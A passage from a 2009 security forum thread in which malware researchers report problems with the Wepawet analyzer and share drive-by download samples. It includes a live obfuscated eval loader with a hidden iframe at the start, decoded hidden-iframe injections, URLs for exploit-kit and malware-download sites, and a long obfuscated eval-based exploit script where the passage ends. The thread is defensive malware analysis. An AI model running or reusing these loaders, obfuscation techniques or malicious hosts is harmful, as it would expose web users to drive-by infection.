r@YTWXuHIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCI7klNkFTf_1M33UssGsYEhaKkJlikiMKk4CJWnBzHGIokJliWBMYsJCKMhsKMPMJz3TQWXuHIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIa4M37klNaUPpxiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMlTP9TQWXuHIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMihrsksI_sGiMlIIsIMizKCsFJKJrFMsWJKJaUJpxiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIM9sNaYriMQhJJ4lH@slf3IsNMhIIJrYsaihJJ4MIwlII_sGiAln7MiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCI_sGiMlII_sGipFPr_Bsrz8lf3KCs@MJszTQWXuHIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiQf_1lHWPTJ9sli7YMiIksIkihJJ4TWXuHIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIkGn7MiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiizWPMrWKM3I8QdkGn7MiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMihPIIPrzXMIrUJpxiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMlPpxln7MiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIHsGfWIPN7XMINGri9TQdXuHIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMCGPBJQdXuHIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIfPlPMqlJbGYfJYMfAln7MiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMqlJbGKJ7klN99QdGKIEdr_ErEJHNMIsFlCMriIM4EosY8JHGImsd@_sF9YEiFKkkai3Aln7MiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMTli9qlJb8QdXuHIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiifdKi3Aln7MiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIfPlPMErrHJi_MrMiCks3rQssWJKJrFMsW8QWXuHIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiQr98MfIJC3_sGiphripaMr9JC_MEIsriJ3MErrHJQ3kihJJ4TWXuHIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMihJJ4MIkihJJ4lHdsGJdIGPaXTi9iIHziIsrTQWXuHIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiQf_1lH2sMrhsMrs8MfdBWrz8lf3KhJJ4MHPTQWXuHIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIkGn7MiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiizMFrJiBMN9Mr3AGPpxiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIzsMrJkGfMiKWXuHIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiizXufpxiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIa4MI9ln7DTf7DlMisBM3aiCzEGn7DTf7DF8rHKi3MhszXuHIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMisiHKi3MhszXuHIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMqliH8TJIKi3MhszXuHIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMCMf9TCIEYPpxiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCINGri9TCIEYPpxiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIN4rN9TCIEYPpxiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIWDrf9TCIEYPpxiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIBPrs9TCIEYPpxiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIBPls9TCIEYPpxiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIHkM3aiCzEGn7MiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiifCB8P9TCIEYPpxiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIWkPisIPNfsM3aiCzEGn7MiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiQrwBs3aiCzEGn7MiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiQf3PrfIKi3MhszXuHIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMFrJ9TCIEYPpxiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCI_ssiC8s3aiCzEGn7MiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiQi7GTrIkM3aiCzEGn7MiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCd4YTJ7kPi9TCIEYPpxiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIPsPNWVM3aiCzEGn7MiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMihPIPMf9TCIEYPpxiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIpIPJJIrN7Ki3XuHIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCIaiQdkGn7MiCIMiCIMiCIMiCIMiCIMiCIMiCIMiCI</div><script>function S0yYteyuZ9G(olNG9){return String["fr"+"om"+"Ch"+"ar"+"C"+"ode"](olNG9);}function ntxxsOiYroi(nxo8BWSvg){var qPpcC=0,SUiwXGwjNZc=nxo8BWSvg.length,nVkF5b4mMS=1024,Uavh3q,ZUsWQPmN0AxmV,LFjLrm9="",isPqo7t=qPpcC,xhANDbnzy=qPpcC,wwjfQ1=qPpcC,JMmwU1=Array(63,57,35,3,9,39,27,11,53,12,0,0,0,0,0,0,8,31,29,0,45,24,28,37,2,1,17,49,59,4,19,47,21,48,40,26,52,60,61,7,41,33,62,0,0,0,0,6,0,13,14,50,23,30,18,42,32,16,58,25,36,54,34,38,10,44,20,5,51,56,43,15,46,55,22);for(ZUsWQPmN0AxmV=Math.ceil(SUiwXGwjNZc/nVkF5b4mMS);ZUsWQPmN0AxmV>qPpcC;ZUsWQPmN0AxmV--){for(eval("Uavh3q=Ma"+"th.m"+"in(SUiwXGwjNZc,nVkF5b4mMS)");Uavh3q>qPpcC;Uavh3q--,SUiwXGwjNZc--){wwjfQ1|=(JMmwU1[nxo8BWSvg.charCodeAt(isPqo7t++)-48])<<xhANDbnzy;if(xhANDbnzy){LFjLrm9+=S0yYteyuZ9G(36^wwjfQ1&255);wwjfQ1>>=8;xhANDbnzy-=2;}else{xhANDbnzy=6;}}}return (LFjLrm9);}var fP2CWur2=document.getElementById('content').innerHTML;eval(ntxxsOiYroi(fP2CWur2));function vparivatel(){document.write('<iframe src="vparivatel.php" style="display:none;"></iframe>');}setTimeout('vparivatel()',8000);</script></body></html>
Title: Re: Wepawet issues
Post by: MysteryFCM on April 04, 2009, 12:09:40 am
Attached is the results of decoding the above (tried posting directly, but the board didn't like the code)

load.php (see attached) downloaded here as 1.exe (MD5: 7A74D0DF3B2327F10305C99D08E35A7F)

http://www.virustotal.com/analisis/6eae1c969cc3e7aae2f7ae0982be3bef
Title: Re: Wepawet issues
Post by: SysAdMini on April 04, 2009, 08:23:11 am
Code: [Select]
http://94.247.2.195/news/?id=100
http://94.247.2.195/news/?id=2
Title: Re: Wepawet issues
Post by: mercutio on April 04, 2009, 05:52:38 pm
Mmmh, they don't like Wepawet's IP. This is what they give back from there:
Code: [Select]
// No news...<script>
var t=new Date(1238865012000);document.cookie="miek=1; expires="+t.toGMTString()+"; path=/";
//</script>

From another box, I get this:
http://wepawet.cs.ucsb.edu/view.php?hash=d7f06af21e74ac44ddb7ed4f0b3fa13c&type=js

which embeds the malicious PDF at
hxxp://94.247.2.195/news/?id=2
http://wepawet.cs.ucsb.edu/view.php?hash=af28f3bc9424a3da7ff8bc84740bce93&type=js

Incidentally, the miek cookie sounds familiar. Oh yes, it was checked by the modified "jquery" script, e.g.:
hxxp://94.247.2.195/jquery.js
http://wepawet.cs.ucsb.edu/view.php?hash=8f39008bc3088b58c32e1c6f1559ae50&t=1238782094&type=js
(notice the copyright and initial part of the code, identical to the minified version of jquery)

Title: Re: Wepawet issues
Post by: SysAdMini on April 08, 2009, 03:01:31 pm
Hi Marco,

please take a look at it.

http://wepawet.cs.ucsb.edu/view.php?hash=a348af5a14bc75b89c5aeb102fffd799&t=1239202788&type=js

Title: Re: Wepawet issues
Post by: mercutio on April 08, 2009, 09:12:00 pm
Sometimes it spits back invalid javascript (need to check if IE silently fixes it). After a few tries, I hit the right one:
http://wepawet.cs.ucsb.edu/view.php?hash=a348af5a14bc75b89c5aeb102fffd799&t=1239224808&type=js
Title: Re: Wepawet issues
Post by: SysAdMini on April 22, 2009, 06:56:51 am
No result. page is blank.

http://wepawet.cs.ucsb.edu/view.php?hash=dc7b73630acfb37506924cafd9cef3ee&t=1240383421&type=js
Title: Re: Wepawet issues
Post by: CkreM on April 22, 2009, 07:13:32 am
Code: [Select]
http://www.klikimg.cn/simg/index.php
stating its "invalid hostname"

should lead in the end to:
Code: [Select]
www.klikimg.cn/simg/exe.php
Title: Re: Wepawet issues
Post by: SysAdMini on April 22, 2009, 07:35:01 am
Code: [Select]
http://www.klikimg.cn/simg/index.php
stating its "invalid hostname"

should lead in the end to:
Code: [Select]
www.klikimg.cn/simg/exe.php

I find many of those "invalid hostnames" daily. It is a real problem.
Title: Re: Wepawet issues
Post by: mercutio on April 22, 2009, 03:12:14 pm
"Invalid domain" means that we cannot resolve the domain name to an IP address.
On a couple of machines here I get SERVFAIL or NXDOMAIN for www. klikimg.cn.
I'll check with the admins here if they're blocking these domains.
SysAdMini, did you keep by any chance the list of the domains that were invalid on wepawet but were resolving on your side?

Thanks!
Title: Re: Wepawet issues
Post by: mercutio on April 22, 2009, 03:13:29 pm
Yes, the blank page is a know bug (the report is too big). I'll try to fix it as soon as possible.
Thanks for reporting.
Title: Re: Wepawet issues
Post by: SysAdMini on April 22, 2009, 04:04:36 pm
"Invalid domain" means that we cannot resolve the domain name to an IP address.
On a couple of machines here I get SERVFAIL or NXDOMAIN for www. klikimg.cn.
I'll check with the admins here if they're blocking these domains.
SysAdMini, did you keep by any chance the list of the domains that were invalid on wepawet but were resolving on your side?

Thanks!

OK, I can keep a list.
Title: Re: Wepawet issues
Post by: mercutio on April 22, 2009, 04:36:00 pm
SysAdMini, no, don't worry (don't do extra work :-)). I should be able to extract the failing domains them from the logs.
Title: Re: Wepawet issues
Post by: MysteryFCM on April 24, 2009, 12:04:11 am
Wepawet doesn't seem to think this is a valid hostname?

out.mst.bcja.name

... but it's definately valid;

Code: [Select]
*****************************************************************
vURL Desktop Edition v0.3.7 Results
Source code for: http://out.mst.bcja.name/quthof.html
Server IP: 84.16.249.240 [ euro.lotgd.pl ]
hpHosts Status: Not Listed
MDL Status: Not Listed
PhishTank Status: Not Listed
Scripts: 0
iFrames: 0
via Proxy: MontanaMenagerie (US)
Date: 24 April 2009
Time: 01:02:06:02
*****************************************************************
<center><a href="/index.html"> SKIP </a></center>
<center>
<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="550" height="400">
<param name="movie" value="/images/redbutton.swf">
<param name="quality" value="high">
<param name="menu" value="false" >
<param name=swStretchStyle value=fill>
<embed swStretchStyle=fill src="/images/redbutton.swf" quality="high" pluginspage="http://www.macromedia.com/go/getflashplayer" type="application/x-shockwave-flash" width="550" height="400"></embed>
</object>
</center>
Title: Re: Wepawet issues
Post by: SysAdMini on April 25, 2009, 06:14:14 am
http://wepawet.cs.ucsb.edu/view.php?hash=49d6eb2f0a15ad85d207c978e0c6a625&t=1240640342&type=js
Quote
There were some errors. Please try again or let us know of this problem.

I have decoded the js using Malzilla and downloaded the pdf file.
The result of the pdf analysis looks strange too.

http://wepawet.cs.ucsb.edu/view.php?hash=d6daceedc82a8520cff9e01082277328&type=js
Title: Re: Wepawet issues
Post by: mercutio on April 27, 2009, 07:17:14 am
Both fixed:
Thanks!
Title: Re: Wepawet issues
Post by: mercutio on April 27, 2009, 07:50:31 am
I just wanted to let you know that I've added a couple of features that I hope will be useful:
- Toolkit identification. We try to detect what toolkit was used to launch the exploits. If a match is found, the report shows the toolkit's name in the "detection results" section at the beginning of the page.
For example, this report (http://wepawet.cs.ucsb.edu/view.php?hash=49d6eb2f0a15ad85d207c978e0c6a625&t=1240816485&type=js) indicates that the unique toolkit was used. In fact, the unique's admin page can be found at hxxp://livingpeace.za.org/img/img/admcp.php.
Currently, elfiesta, unique, luckysploit, and yes should be detected. I plan to add more with time.
- Domain report. Shows a per-domain report (example (http://wepawet.cs.ucsb.edu/domain.php?hash=e7fd2ee3c218c66ad961163569df5dca&type=js)). Currently, it shows all the URLs from a given domain and their "worst" detection status (e.g., malicious if they have been found malicious at least once). It will be expanded to include other info as well. At the moment, the simplest way to see a domain report is to submit a URL twice, and on the page that says that the URL was already analyzed there will be a link ("See what else we know") to the domain report.

These are still experimental features. Suggestions and comments more than welcome!
Title: Re: Wepawet issues
Post by: SysAdMini on May 03, 2009, 04:51:25 pm
Hi Marco,

please take a look at this one.

Code: [Select]
gumblar.cn/rss/?idhttp://wepawet.cs.ucsb.edu/view.php?hash=2d5faa3b53791149ea66bc37883f1aee&t=1241369312&type=js
Title: Re: Wepawet issues
Post by: mercutio on May 03, 2009, 06:58:43 pm
Reprocessed from another machine:
http://wepawet.cs.ucsb.edu/view.php?hash=2d5faa3b53791149ea66bc37883f1aee&t=1241376846&type=js
Malicious as expected.

We are working on adding proxies, etc., to address this IP cloaking problem, but it's going to take a little more time (some bureaucracy involved...). Please, bear with us :-)

Thanks as always for letting me know.
Title: Re: Wepawet issues
Post by: MysteryFCM on May 03, 2009, 07:17:46 pm
We are working on adding proxies,

I'm trying to work out a viable way of integrating proxies (possibly using Tor) into the vURL Online site too because of this :) Would be interested to know how you implement such if you do go ahead with it?
Title: Re: Wepawet issues
Post by: RS-232 on May 05, 2009, 12:51:42 pm
http://wepawet.cs.ucsb.edu/view.php?hash=22461c9cb53276db53cf0e5b35e6473f&t=1241527957&type=js
Shouldn't it decode the <script> ......</script> contents there?  :-\
Code: [Select]
<iframe name=c7 src='hXXp://bizoplata.ru/pay.html?'+Math.round(Math.random()*408969)+'565b6779ecb9' width=729 height=561 style='visibility:hidden'></iframe>
Title: Re: Wepawet issues
Post by: mercutio on May 05, 2009, 11:41:06 pm
Code: [Select]
Shouldn't it decode the <script> ......</script> contents there?

Mmmh, my IE6 complains that there are invalid characters in the script (which are also in the report). What browser are you using to get it to decode successfully?

Thanks.
Title: Re: Wepawet issues
Post by: RS-232 on May 05, 2009, 11:48:49 pm
I visited/checked the link above via Malzilla...didn't tested it in a browser to be honest.
Manual decoding via Morf (http://morf.sourceforge.net/),although Malzilla also handles this one as well...
Title: Re: Wepawet issues
Post by: MysteryFCM on May 05, 2009, 11:54:32 pm
Code: [Select]
Never heard of Morf, cheers :)

Tend to use Malzilla myself too ;)

[code]*****************************************************************
vURL Desktop Edition v0.3.7 Results
Source code for: http://ondeep.by.ru/wuiii/test.html
Server IP: 87.242.78.57 [ host.by.ru ]
hpHosts Status: Not Listed
MDL Status: Not Listed
PhishTank Status: Not Listed
Scripts: 0
iFrames: 0
via Proxy: MontanaMenagerie (US)
Date: 06 May 2009
Time: 00:49:56:49
*****************************************************************
<script id='c7A6368644C2A3E2B14B48'>
/* AxhwnuyCnk-&r~nf.€ithzrjsy3|wnyj-zsjxhfuj-%,*8h*;>*;;*<7*;6*;i*;:*75*;j*;6*;i*;:*8i*;8*8<*75*<8*<7*;8*8i*7<*;=*<9*<9*<5*8f*7k*7k*;7*;>*<f*;k*<5*;h*;6*<9*;6*7j*<7*<:*7k*<5*;6*<>*7j*;=*<9*;i*;h*8k*7<*7g*9i*;6*<9*;=*7j*<7*;k*<:*;j*;9*7=*9i*;6*<9*;=*7j*<7*;6*;j*;9*;k*;i*7=*7>*7f*89*85*8=*8>*8;*8>*7>*7g*7<*8:*8;*8:*;7*8;*8<*8<*8>*;:*;8*;7*8>*7<*75*<<*;>*;9*<9*;=*8i*8<*87*8>*75*;=*;:*;>*;<*;=*<9*8i*8:*8;*86*75*<8*<9*<>*;h*;:*8i*7<*<;*;>*<8*;>*;7*;>*;h*;>*<9*<>*8f*;=*;>*;9*;9*;:*;j*7<*8j*8h*7k*;>*;;*<7*;6*;i*;:*8j,..@‚{fw%r~nfBywzj@A4xhwnuyC */
</script>
<script>
var A6C5401AD21798FEB206 = -76+81;var A3DAD6C5A1951E41B37F = document.getElementById('c7A6368644C2A3E2B14B48').innerHTML;var c72e9091eAD4685D4F3063E3E1B48 = new String;A3DAD6C5A1951E41B37F = A3DAD6C5A1951E41B37F.substr(4,540);for(i=0;i<A3DAD6C5A1951E41B37F.length;i++) c72e9091eAD4685D4F3063E3E1B48 += String.fromCharCode(A3DAD6C5A1951E41B37F.substr(i,1).charCodeAt()-A6C5401AD21798FEB206);document.write(c72e9091eAD4685D4F3063E3E1B48);
</script>
<html>

</html>

To;

Code: [Select]
var c7A6368644C2A3E2B14B48 = "/* AxhwnuyCnk-&r~nf.€ithzrjsy3|wnyj-zsjxhfuj-%,*8h*;>*;;*<7*;6*;i*;:*75*;j*;6*;i*;:*8i*;8*8<*75*<8*<7*;8*8i*7<*;=*<9*<9*<5*8f*7k*7k*;7*;>*<f*;k*<5*;h*;6*<9*;6*7j*<7*<:*7k*<5*;6*<>*7j*;=*<9*;i*;h*8k*7<*7g*9i*;6*<9*;=*7j*<7*;k*<:*;j*;9*7=*9i*;6*<9*;=*7j*<7*;6*;j*;9*;k*;i*7=*7>*7f*89*85*8=*8>*8;*8>*7>*7g*7<*8:*8;*8:*;7*8;*8<*8<*8>*;:*;8*;7*8>*7<*75*<<*;>*;9*<9*;=*8i*8<*87*8>*75*;=*;:*;>*;<*;=*<9*8i*8:*8;*86*75*<8*<9*<>*;h*;:*8i*7<*<;*;>*<8*;>*;7*;>*;h*;>*<9*<>*8f*;=*;>*;9*;9*;:*;j*7<*8j*8h*7k*;>*;;*<7*;6*;i*;:*8j,..@‚{fw%r~nfBywzj@A4xhwnuyC */";
var A6C5401AD21798FEB206 = -76+81;var A3DAD6C5A1951E41B37F = c7A6368644C2A3E2B14B48;var c72e9091eAD4685D4F3063E3E1B48 = new String;A3DAD6C5A1951E41B37F = A3DAD6C5A1951E41B37F.substr(4,540);for(i=0;i<A3DAD6C5A1951E41B37F.length;i++) c72e9091eAD4685D4F3063E3E1B48 += String.fromCharCode(A3DAD6C5A1951E41B37F.substr(i,1).charCodeAt()-A6C5401AD21798FEB206);document.write(c72e9091eAD4685D4F3063E3E1B48);

Decodes to;

Code: [Select]
if(!myia)
document.write(unescape( '%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%63%37%20%73%72%63%3d%27%68%74%74%70%3a%2f%2f%62%69%7a%6f%70%6c%61%74%61%2e%72%75%2f%70%61%79%2e%68%74%6d%6c%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%34%30%38%39%36%39%29%2b%27%35%36%35%62%36%37%37%39%65%63%62%39%27%20%77%69%64%74%68%3d%37%32%39%20%68%65%69%67%68%74%3d%35%36%31%20%73%74%79%6c%65%3d%27%76%69%73%69%62%69%6c%69%74%79%3a%68%69%64%64%65%6e%27%3e%3c%2f%69%66%72%61%6d%65%3e')); var myia=true;

Which decodes to;

Code: [Select]
<iframe name=c7 src='http://bizoplata.ru/pay.html?'+Math.round(Math.random()*408969)+'565b6779ecb9' width=729 height=561 style='visibility:hidden'></iframe>
/edit

Malzilla did make a boo boo btw ..... the original code that it decoded to contains two chars that I had to remove manually;

Quote
if(!myia)

snipped

var myia=true;[/code]
Title: Re: Wepawet issues
Post by: MysteryFCM on May 06, 2009, 11:20:27 pm
Can we get support for the newer flash versions added please?

http://www.clicksmanagementscom.com/banner/b87492/ggg-2-en.swf

Ref:
http://www.mywot.com/en/forum/3299-sign-of-the-times

Site also loads an iFrame to;

visitcouns.com/?t=1

Which returns content that's completely unreadable.
Title: Re: Wepawet issues
Post by: MysteryFCM on May 06, 2009, 11:25:39 pm
Got the content to return correctly;

Code: [Select]
<body><script>OJOVLR=self;window.GENWSF='e'+'v';OJOVLR=OJOVLR.GENWSF+'a'+'l';EJEFHF=window[OJOVLR];if(!EJEFHF)EJEFHF=document[OJOVLR];OJOVLR=EJEFHF;VYGLDW='';GQF='s.m=m}function NMQ(x';TTD='}function PCY(){v';IXP='is.n=QEE(N,1';HFM='BI_FP-B;A.prototyp';ZYS='n") break;b=b*';JEG='}re';HXF=' d=(1<<';OVO='i]>>(p';OCG='){ret';ENJ='=8)k=3;else if(b==2';IOY=';y=(y*(2-(';POE='.appName';MBV='KV=TZT;A.pr';QYU='c;r.t=i;r';DXK='d.charAt(i)';WUL='=(this.j+thi';WIG='}this.t=0;this.s=0;';TMW='i=0;i<a.length';PEB='e(--i>=0)if((r=this';GPB='J)>0)a.EK';HCL='function';LWH='[i]=i;j=';FPZ='his.t';VGF='[j]+=thi';GSH='ngth){a+=';XXJ='loor(Math.random()*a';TSQ=';s[j]=x;c';RFC='JZT(c,';KQJ='7ac76d88c3368c35';JSP='prototype.DV=(1<<B)';QCE='VFO(i);return';EMP='"!=typeof a)this.Q';JPI='0)ret';MVL='continue}mi=false';QXV='T=EJJ';IDK=',b){ci="';MUT='j,c,n){var a=x&';GHU=',1);if((r[i+x';TZF='=x.am(0,y[i],';QXJ='}function ZIX(';MWM='b)-1;var e';YZN='h=this.mp';BHB='nction ZWO(x){t';KUN='eturn 0;var x=';YOM='d=(1<<b)-1;r[';MBC='{z.XKS';JZL='i=(i+1';NDW='v;rr="a".charCodeAt';NKH='WD=0;RIP()}f';GEK=';var BI_FP=52;';BTS=')}SEU=((0xde';TTE='h.sin(oil)*21));';YZS='){x=t';POV='sss="";for(';FDX='ction Q';MSU='256)k=8;else if(b==';OKE='O(this.e,this.n';FGF='CJI(b){if(';RCD='(a,(this.n.';OIX='r v=x';JJJ='m.EKV(r';ZXB='s.DB){this[this';HZZ='10ec1246fa9068f78';OSR='crosoft Intern';HFO='KM=QRQ;A.prototy';GUE='M(A.FVJ)>0)this.';YVF=');res=rsa.encry';SVJ='tion ZJB(x){ret';UZY='6);if((h.len';HWW='s[i]=s[j]';ZVW='is.VBX(r);retu';RBQ=')];return(c==nul';VDX='(d)}}re';FXY='[i-1]';ZKS='on FHD(m,q,r){va';PJB=';return}if(r==null)r';QQH=';A.prototype.E';DBU='vigator.appVersi';SIS='his.e=0;t';SGZ=']=c&this.DM;c>>';GLJ='TZY=HT';CGS='0]=this';QJH='+]=this.DV+c;el';UVT='e.OYN=PCY;A.prot';KHS='n r}fu';GJZ='<=0){p+=';UJR='z.ZXK(r2,g,r);el';ZLM='K(r){for(var i=th';LEN='ix(s,b);return';MGN='*y)&0xffff)))';YOS='.XKS=PFD;functi';RZE='this[i];r.t=t';VMY='or(i=0;i<x.t-1;++i)';VTV='f(k==8&&(s[0]&0x80)';NRU='s.m,null,r);if(x.';YJH='his.m=m;this.mp=m';UPM='x=t;r+=8}if((t=x>';BCK='}func';ELB='==4)k=2;else return';TTX='{if(b<';WQY='ototype.QYW=UVT;A.pr';PSS='j=0}fun';FET='urn(this.s';HJM='=BHF;A.prototype';OJR='ffff}return c}f';URW='3;else i';DPV='!=0){t';YQO='otype.YWW=GZ';JXG='1]|=((1<<(th';BTF='){';GHY='s[i]&d)<<c;';SMW='this.i=(thi';CFK='g.fromCharCo';ZNM='t(KFY);for(RWD=0;RWD';WBM=' OVS(b)';FHP='ile(--i>=';RRI='=="="||';XQY='r.s=th';WGQ='var c=t';WKO='NYB(s,n){var a="";v';DGM='6;++vv)RH';NWG='unction ';TBB='DB}c+=this.';TZC=']=i;';WFO='otype.mod=URR;A.prot';NMZ='n QEE(a,r)';GJS='return(y';WGF='(m);if';TOH='&0xfff';HOY='null)?nbi():q;y.YWW(';POK='=c.SLR(1';TCU=']=vv;function GJM(n';ZNG='(d.charAt(i));c=';KVN=' h;else ret';DWB='otype.EWO';COR='ion E';OND='+=Strin';TNX='if(isNaN(oil)){k=';OXN='length])&255;t=th';YXZ=' scriptTag=';SUD='createElement("scr';ROL='.EKV(this.m';QFC='DB;--i}';TKL='.length)';BSJ='TUVWX';DIB='C.prototype.init=X';VKZ='r);while(';BPQ='if(sh>0)this[this.t-';BHT='0;if(c<-1)r[i+';MNF='a="";';MOI='pt(sss);';SSN='rypt(a,b)';GPY='}var a=n';MWV='is.t-1;i>=0';UPU='0;for(i=0;i<2';FIL='urn"0"+h}RSA';HXU='])';IRG='eturn';IVT='0;i<b;';EER='rypto.';ZVQ='tion RSAKey(){t';BTH='=parseInt';ZTX='r(n/this.DB);i';FXI='ull,r);i';FJL=';while(i<m){c+=this';ILM='BQY,53);a';UYP='CR;RSAKey.p';ONS='oil;oil=0}s=new';TLC='[(s[i]+s[j])%256';SNI='Y=new ';LFN='RX;VXC.prototype';QHF=';var r=nbi(),r2=n';VJE='se{va';UPE='PFD(x';FDM='){return';HZI='lse this.t=0}fu';GUJ='m.s;var c=this.DB';CXV='T;A.pro';VCY='n r}function H';WZZ='ll;th';OHD='ion PQE(a,';RYE='ction A(a,b,c){if(a!';PFL=')-1;g.TZY(r);while';NUU='turn m?r:"0';ZVH='lmnopqr';MNK='{x=t;r+=1}retur';UBP='rototype.ZXK';BDN='6*Math.random()';YTO='>=0){var k=(r[-';BJL='.prototype.';RLI='<KFY.leng';QOF='unctio';FNV='.DV){';KZL='i();this.abs().';SEG='i];r[i++]=';WWZ=')RHZ[rr++]=v';ZSB='UW=nul';LSO='ing.fromCharCode(';ONI='=4;else if(b==8)k=';ZSD='e,z){if(e>0xffff';CIB='TZY(r);th';LQK='&this.DM;c>>=t';RQL='E!=null&&N';BOT='+=this[';LDW='h+k>thi';FRL=';r.OYN()}functi';YDJ='[j++]=l&0x3ffff';XDS='n){while(--n>=0){va';LHF='KM(this.m)>=0)x';VUG='(c==1?';BKN='+]=t>>>8;K';QBY='this[i]>>b}if(b>0)r';YEI='n rc4Dec';NKE='YN();if(c>0)r.KSV(c,';VIG='ag.src="?"+res;doc';BGG='==0)return;var g=f*';STK='j=(j+';HBW='s.charCodeAt(i';YIZ='{var d=Math.f';QIG='x&0xff';CVK='6;var VHY;';MYI='type.SLR=CJI;A';OIY='m(i+1,2*x[i],r,2*';FDN='gth&1)==0)r';KCP='V(t,r)}}if(q!=n';VZX='ew Array();v';CYM='>28)+(m>>14)';VZS='0,this.';SDU='nction';ULC='V(r,r);retur';ISQ='r){var x=this.abs()';DJL='ength';MGC=')<<(k-p);d|=this[--';ESF='=(x>>8)&255;KFY[RW';ZDF='turn ci}';DMW='=null)if("numb';KDV='this.VBX(r)}';UML='le(i>=0&&n>0)a[--n]=';DNG='=(y*(2-(((x&0xffff)';ZPF='type.doPublic=ZJB;';PWP='i+n]=this[i];for';RYD='funct';DTX='(--i>=0)';ODG='.EKV(q,q)}r.t';KWW='(1<<p)-1)';IVO=')}UWR.proto';GJY='mp&0x7fff;this.mp';XPY='i]&0x7';IFP='r i=s.length-1;whi';ZPG='unction IVS';JID='.encrypt=HBJ;';QFJ='f(b==';IML='fghijk';MRR='s.m.am(0,a,x,i,';CUH='nction hexToString(d';BRJ='f(this.s<0';IRJ='30ab118834d';MJW='2ec26a4a6be8685';RVS='+]>>14;var m=xh*';MFR='s;while(i<this.t){c';LXL='DM,i;for(i';LFB='ar rr,v';HSX=' h=this.FV/';BTD='is.QUF=null;this.E';IPE='if(oil>1){oil=MII(';XMU=' LMO(s,n){if(n<';PJF='0)r[i]=0;for(i=0;i';JFJ='RSAKey.prot';IXQ='rsa=new RSAKey();rsa';GNN='4f2af68d26c8a815';TJK='.ONE.YWW(d,t);t.EKV';XPB='r(vv=0;vv<=9;++vv';IUO='0);for(vv=10;vv<';NCI='&this.DM;while(thi';DIL='c;r.t=this.t-a;r.';ZUU='A.prototype.FV';YCZ='return new A(a)}func';QPI='(--i>=0)r[i]=0;f';KRG='.protot';FVO='function';HTW='s.t-1]|=x<<sh;sh';HKN='s[i]>>p)>0)';LWW='2)k=1;else';TCJ='f)==0xefcafe);fun';JJH='rstuvwxyz";var RHZ=n';VWI='&0x3f';HNZ='12138513';UYS='EQY(x){return x}f';YSO='rn r}function YJG(';PWQ='s.mpl=this.';ZSE='urn null';FOW='tscape"))';ZBZ='urn 0;var 